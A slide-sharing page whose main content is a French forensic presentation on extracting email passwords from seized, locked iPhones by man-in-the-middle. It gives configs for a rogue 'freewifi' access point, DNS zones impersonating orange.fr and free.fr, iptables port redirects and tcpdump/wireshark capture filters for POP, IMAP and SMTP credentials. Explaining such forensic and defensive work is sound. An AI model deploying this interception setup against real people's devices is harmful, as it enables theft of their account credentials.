GAL2024 - Décarbonation du secteur laitier : la filière s'engageGAL2024 - Décarbonation du secteur laitier : la filière s'engage
GAL2024 - Décarbonation du secteur laitier : la filière s'engageInstitut de l'Elevage - Idele
 
JTC 2024 - Réglementation européenne BEA et Transport.pdf
JTC 2024 - Réglementation européenne BEA et Transport.pdfJTC 2024 - Réglementation européenne BEA et Transport.pdf
JTC 2024 - Réglementation européenne BEA et Transport.pdfInstitut de l'Elevage - Idele
 
GAL2024 - Renouvellement des actifs : un enjeu pour la filière laitière franç...
GAL2024 - Renouvellement des actifs : un enjeu pour la filière laitière franç...GAL2024 - Renouvellement des actifs : un enjeu pour la filière laitière franç...
GAL2024 - Renouvellement des actifs : un enjeu pour la filière laitière franç...Institut de l'Elevage - Idele
 
GAL2024 - L'élevage laitier cultive la biodiversité
GAL2024 - L'élevage laitier cultive la biodiversitéGAL2024 - L'élevage laitier cultive la biodiversité
GAL2024 - L'élevage laitier cultive la biodiversitéInstitut de l'Elevage - Idele
 
GAL2024 - Parcellaire des fermes laitières : en enjeu de compétitivité et de ...
GAL2024 - Parcellaire des fermes laitières : en enjeu de compétitivité et de ...GAL2024 - Parcellaire des fermes laitières : en enjeu de compétitivité et de ...
GAL2024 - Parcellaire des fermes laitières : en enjeu de compétitivité et de ...Institut de l'Elevage - Idele
 
GAL2024 - Traite des vaches laitières : au coeur des stratégies d'évolution d...
GAL2024 - Traite des vaches laitières : au coeur des stratégies d'évolution d...GAL2024 - Traite des vaches laitières : au coeur des stratégies d'évolution d...
GAL2024 - Traite des vaches laitières : au coeur des stratégies d'évolution d...Institut de l'Elevage - Idele
 
JTC 2024 La relance de la filière de la viande de chevreau.pdf
JTC 2024 La relance de la filière de la viande de chevreau.pdfJTC 2024 La relance de la filière de la viande de chevreau.pdf
JTC 2024 La relance de la filière de la viande de chevreau.pdfInstitut de l'Elevage - Idele
 

Recently uploaded (20)

GAL2024 - Méthane 2030 : une démarche collective française à destination de t...
GAL2024 - Méthane 2030 : une démarche collective française à destination de t...GAL2024 - Méthane 2030 : une démarche collective française à destination de t...
GAL2024 - Méthane 2030 : une démarche collective française à destination de t...
 
comprehension de DDMRP dans le domaine de gestion
comprehension de DDMRP dans le domaine de gestioncomprehension de DDMRP dans le domaine de gestion
comprehension de DDMRP dans le domaine de gestion
 
GAL2024 - Situation laitière 2023-2024 : consommation, marchés, prix et revenus
GAL2024 - Situation laitière 2023-2024 : consommation, marchés, prix et revenusGAL2024 - Situation laitière 2023-2024 : consommation, marchés, prix et revenus
GAL2024 - Situation laitière 2023-2024 : consommation, marchés, prix et revenus
 
Câblage, installation et paramétrage d’un réseau informatique.pdf
Câblage, installation et paramétrage d’un réseau informatique.pdfCâblage, installation et paramétrage d’un réseau informatique.pdf
Câblage, installation et paramétrage d’un réseau informatique.pdf
 
WBS OBS RACI_2020-etunhjjlllllll pdf.pdf
WBS OBS RACI_2020-etunhjjlllllll pdf.pdfWBS OBS RACI_2020-etunhjjlllllll pdf.pdf
WBS OBS RACI_2020-etunhjjlllllll pdf.pdf
 
conception d'un batiment r+4 comparative de defferente ariante de plancher
conception d'un  batiment  r+4 comparative de defferente ariante de plancherconception d'un  batiment  r+4 comparative de defferente ariante de plancher
conception d'un batiment r+4 comparative de defferente ariante de plancher
 
JTC 2024 - Leviers d’adaptation au changement climatique, qualité du lait et ...
JTC 2024 - Leviers d’adaptation au changement climatique, qualité du lait et ...JTC 2024 - Leviers d’adaptation au changement climatique, qualité du lait et ...
JTC 2024 - Leviers d’adaptation au changement climatique, qualité du lait et ...
 
JTC 2024 - DeCremoux_Anomalies_génétiques.pdf
JTC 2024 - DeCremoux_Anomalies_génétiques.pdfJTC 2024 - DeCremoux_Anomalies_génétiques.pdf
JTC 2024 - DeCremoux_Anomalies_génétiques.pdf
 
Algo II : les piles ( cours + exercices)
Algo II :  les piles ( cours + exercices)Algo II :  les piles ( cours + exercices)
Algo II : les piles ( cours + exercices)
 
GAL2024 - Consommations et productions d'énergies dans les exploitations lait...
GAL2024 - Consommations et productions d'énergies dans les exploitations lait...GAL2024 - Consommations et productions d'énergies dans les exploitations lait...
GAL2024 - Consommations et productions d'énergies dans les exploitations lait...
 
GAL2024 - Changements climatiques et maladies émergentes
GAL2024 - Changements climatiques et maladies émergentesGAL2024 - Changements climatiques et maladies émergentes
GAL2024 - Changements climatiques et maladies émergentes
 
CAP2ER_GC_Presentation_Outil_20240422.pptx
CAP2ER_GC_Presentation_Outil_20240422.pptxCAP2ER_GC_Presentation_Outil_20240422.pptx
CAP2ER_GC_Presentation_Outil_20240422.pptx
 
JTC 2024 - SMARTER Retour sur les indicateurs de santé .pdf
JTC 2024 - SMARTER Retour sur les indicateurs de santé .pdfJTC 2024 - SMARTER Retour sur les indicateurs de santé .pdf
JTC 2024 - SMARTER Retour sur les indicateurs de santé .pdf
 
GAL2024 - Décarbonation du secteur laitier : la filière s'engage
GAL2024 - Décarbonation du secteur laitier : la filière s'engageGAL2024 - Décarbonation du secteur laitier : la filière s'engage
GAL2024 - Décarbonation du secteur laitier : la filière s'engage
 
JTC 2024 - Réglementation européenne BEA et Transport.pdf
JTC 2024 - Réglementation européenne BEA et Transport.pdfJTC 2024 - Réglementation européenne BEA et Transport.pdf
JTC 2024 - Réglementation européenne BEA et Transport.pdf
 
GAL2024 - Renouvellement des actifs : un enjeu pour la filière laitière franç...
GAL2024 - Renouvellement des actifs : un enjeu pour la filière laitière franç...GAL2024 - Renouvellement des actifs : un enjeu pour la filière laitière franç...
GAL2024 - Renouvellement des actifs : un enjeu pour la filière laitière franç...
 
GAL2024 - L'élevage laitier cultive la biodiversité
GAL2024 - L'élevage laitier cultive la biodiversitéGAL2024 - L'élevage laitier cultive la biodiversité
GAL2024 - L'élevage laitier cultive la biodiversité
 
GAL2024 - Parcellaire des fermes laitières : en enjeu de compétitivité et de ...
GAL2024 - Parcellaire des fermes laitières : en enjeu de compétitivité et de ...GAL2024 - Parcellaire des fermes laitières : en enjeu de compétitivité et de ...
GAL2024 - Parcellaire des fermes laitières : en enjeu de compétitivité et de ...
 
GAL2024 - Traite des vaches laitières : au coeur des stratégies d'évolution d...
GAL2024 - Traite des vaches laitières : au coeur des stratégies d'évolution d...GAL2024 - Traite des vaches laitières : au coeur des stratégies d'évolution d...
GAL2024 - Traite des vaches laitières : au coeur des stratégies d'évolution d...
 
JTC 2024 La relance de la filière de la viande de chevreau.pdf
JTC 2024 La relance de la filière de la viande de chevreau.pdfJTC 2024 La relance de la filière de la viande de chevreau.pdf
JTC 2024 La relance de la filière de la viande de chevreau.pdf
 

Extraction mots de passe par attaque Man-in-the-middle

  • 1. boolaz.com Uriel Expert - 1 avenue Henri Dunant 98000 Monaco Extraction de mots de passe depuis un smartphone par attaque de type man-in-the-middle Bruno Valentin
  • 3. boolaz.com Problématique • Saisie d'une dizaine de périphériques fonctionnant sous iOS dans le cadre d’un dossier judiciaire • Nécessité de déterminer les propriétaires des périphériques ainsi que les comptes de courrier électroniques configurés dans chacun d'eux > gmail (SSL), orange, free 3
  • 4. boolaz.com Control center • Certains périphériques sont verrouillés par un code > mis en mode avion par le control center (habituellement activé) 4
  • 5. boolaz.com Extraction des mots de passe • non gérée par les logiciels spécialisés > xry, cellebrite UFED, MPE+, oxygen, mobiledit, lantern, elcomsoft 5
  • 6. boolaz.com Ordre de wipe lancé depuis iCloud 6
  • 8. boolaz.com Approche adoptée • Mise en place d’un point d’accès virtuel > détournement / interception des données • Attaque man-in-the-middle • Utilisation d’un SSID courant > freewifi par exemple • Inviter les smartphones à se reconnecter sur 
 un SSID connu (smartphones verrouillés) • technique du pot de miel 8
  • 9. boolaz.com Solution matérielle disponible : Pineapple • 2x WiFi cards (Atheros 9331 & RTL8187) • Emplacement micro-SD pour le stockage • packages disponibles : aircrack-ng, dsniff, easy-creds, ettercap, hping3, httptunnel, karma, kismet, macchanger, mdk3, ngrep, nmap, nodogsplash captive portal, privoxy, ptunnel, snort, sslsniff, sslstrip, ssltunnel, stunnel, tcpdump, tor, and reaver 9
  • 11. boolaz.com Inconvénients • 150$ • manque de flexibilité de la configuration logicielle • reconfiguration pour chaque SSID • nécessité de contrôler les données qui pourraient sortir ou entrer > connexion sur les serveurs d'Apple et réinitialisation des smartphones > récupération des courriers électroniques en attente dans les BAL > problèmes juridiques 11
  • 12. boolaz.com Approche adoptée • Les périphériques doivent être sortis du mode avion
 mais mais ne doivent pas avoir accès à Internet > réinitialisation immédiate
 • Nécessité de mettre en place une infrastructure cloisonnée pour émuler, en local, les serveurs de courrier électronique des fournisseurs > Cage de Faraday logicielle > But : Laisser penser aux périphériques 
 qu’ils peuvent atteindre les serveurs 
 internet de leurs opérateurs pour qu’ils 
 présentent leurs identifiants / mots de passe 12
  • 13. boolaz.com Logiciels et matériels utilisés • Moteur de virtualisation > VMWare fusion • Distribution linux > Xubuntu 12.04 > Backtrack ou Kali > ou autre • Dongle USB > Dlink DWL-G122 13
  • 14. boolaz.com Infrastructure 14 freewifi iCloud.com ? icloud =
 192.168.66.1 192.168.66.1 Pas de wipe pop.orange.fr ? pop.orange.fr
 192.168.66.1 pop.orange.fr port 110
 user : toto@orange.fr pass : MySuperPass
  • 16. boolaz.com Système Linux • Cloisonnement total • Interface réseau déconnectée dans la VM • système autonome > interception de toutes les requêtes DNS et réponse inconditionnelle > Différents services émulés localement • S'assurer du cloisonnement avant d'y connecter le smartphone • S'assurer de l'absence dans l'environnement de 
 SSID connus/OPN que le smartphone pourrait accrocher 16
  • 17. boolaz.com Services Linux : 4 briques • HOSTAPD > IEEE 802.11 • DHCPD > Attribution automatique IP • BIND > Serveur DNS • POSTFIX + POP/IMAP + SASL > Emulation des serveurs de courrier 17 HOSTAPD DHCPD BIND POSTFIX
  • 18. boolaz.com HOSTAPD • apt-get install hostapd • /etc/hostapd/hostapd.conf interface=wlan0 channel=6 driver=nl80211 ssid=freewifi auth_algs=1 hw_mode=g max_num_sta=1 macaddr_acl=0 ignore_broadcast_ssid=0 • récupération possible des probe requests (mode actif) 18
  • 20. boolaz.com DHCPD • apt-get install dhcp3-server • /etc/dhcp/dhcpd.conf ddns-update-style none; option domain-name-servers ns1.freewifi.fr; default-lease-time 600; max-lease-time 7200; log-facility local7; subnet 192.168.66.0 netmask 255.255.255.0 { range 192.168.66.25 192.168.66.50; option domain-name-servers 192.168.66.1; option routers 192.168.66.1; } 20
  • 21. boolaz.com Zones DNS gérées par le Bind local zone "freewifi.fr" { type master; file "/etc/bind/freewifi.fr"; };   zone "orange.fr" { type master; file "/etc/bind/orange.fr"; }; zone "free.fr" { type master; file "/etc/bind/free.fr"; }; 21
  • 22. boolaz.com Zone DNS orange.fr $ORIGIN orange.fr. $TTL 60 ; validite des reponses @ IN SOA ns1.freewifi.fr. root.freewifi.fr. ( 2002121136 ; sn 8h ; refresh slave (mise à jour slave) 15m ; update retry (slave re-essaye) 1w ; expiry (slave arrete apres) 3h ) ; minimum (plus utilisee)   @ IN NS ns1.freewifi.fr.   @ IN A 192.168.66.1 www IN A 192.168.66.1 pop IN CNAME www imap IN CNAME www smtp IN CNAME www 22
  • 24. boolaz.com SMTP Postfix • /etc/postfix/main.cf myhostname = jailsrv alias_maps = hash:/etc/aliases alias_database = hash:/etc/aliases myorigin = /etc/mailname mydestination = smtp.orange.fr smtp.free.fr jailsrv localhost relayhost = mynetworks = 127.0.0.0/8 192.168.66.1/24 mailbox_size_limit = 0 recipient_delimiter = + inet_interfaces = all smtpd_sasl_auth_enable = yes 24
  • 25. boolaz.com Authentification SASL • "Simple Authentication and Security Layer" • But : Gérer l'authentification SMTP pour permettre aux utilisateurs de s'identifier et récupérer leurs identifiants d'envoi • /etc/default/saslauthd START=yes DESC="SASL Authentication Daemon" NAME="saslauthd"
 MECHANISMS="pam"
 MECH_OPTIONS=""
 THREADS=5 OPTIONS="-c -m /var/run/saslauthd" 25
  • 26. boolaz.com 26 Notre pot de miel est prêt 👌
  • 27. boolaz.com U R
 I
 E
 L Activation du wifi Désactivation du mode hors ligne sur les smartphones 27
  • 30. boolaz.com Evidemment : pas de portail captif 30
  • 33. boolaz.com Interception des flux pop, imap et smtp • Si le DNS n'est pas détourné en totalité, il est important d'intercepter tous les flux susceptibles de révéler les mots de passe • Le point d’accès intercepte les flux pertinents et les redirige sur le serveur local > SMTP : 25, 587 > POP : 110 > IMAP : 143 • Cette redirection transparente des flux se fait par l’utilisation de règles de firewall iptables iptables -t nat -A PREROUTING -p tcp --dport 110 -j DNAT --to-destination 192.168.66.1 iptables -t nat -A PREROUTING -p tcp --dport 143 -j DNAT --to-destination 192.168.66.1 iptables -t nat -A PREROUTING -p tcp --dport 25 -j DNAT --to-destination 192.168.66.1 iptables -t nat -A PREROUTING -p tcp --dport 587 -j DNAT --to-destination 192.168.66.1 33
  • 35. boolaz.com Sniffing sélectif • La récupération des mots de passe peut être effectuée par un sniffing sélectif sur des ports > 110, 143 : POP, IMAP > 25, 587 : SMTP • Interception du flux réseau > TCPdump tcpdump -vv -x -X -s 1500 -i wlan 0 
 'port 110 or port 143 or port 25 or port 587' > Wireshark wireshark -i wlan0 -p -k -f 
 "port 110 or port 143 or port 25 or port 587" 35
  • 38. boolaz.com SMTP Auth • Enregistrement de l'authentification SMTP / SASL • Sortie TCPDUMP • Pour l’authentification SMTP, les informations recueillies sont en base64 38
  • 40. boolaz.com GMail • la messagerie de google utilise par défaut le SSL pour la connexion • Même en détournant le flux vers la machine virtuelle, il est impossible d'extraire le mot de passe, celui-ci étant chiffré • Il est nécessaire de désactiver le SSL pour la connexion GMAIL. • Il en est de même pour les autres messageries
 sécurisées • Cela signifie donc qu'il faut déverrouiller
 l'iphone pour pouvoir changer ce paramètre 40
  • 45. boolaz.com Filtres wireshark • Il est possible de filtrer les packets plus finement via l'utilisation de filtres d'affichage dans Wireshark 45
  • 46. boolaz.com iCloud • cf : site web apple.com • chiffrement AES minimal de 128 bits • chiffrement impossible à désactiver sur iCloud > pas d'option pour le faire dans l'iphone, 
 même s'il est déverrouillé 46
  • 48. boolaz.com Requêtes DNS : des informations pleines de sens 48
  • 49. boolaz.com Aller plus loin • Reconfiguration automatique du SSID par script > Brute force sur le SSID • Emulation d'un serveur HTTP / HTTPS • redirection inconditionnelle de toutes les requêtes web des smartphones sur le serveur web local installé sur la machine • Récupération des requêtes GET et POST 49
  • 52. boolaz.com Uriel Expert - 1 avenue Henri Dunant 98000 Monaco Merci de votre attention 
 
 
 bvalentin@uriel-expert.com www.uriel-expert.com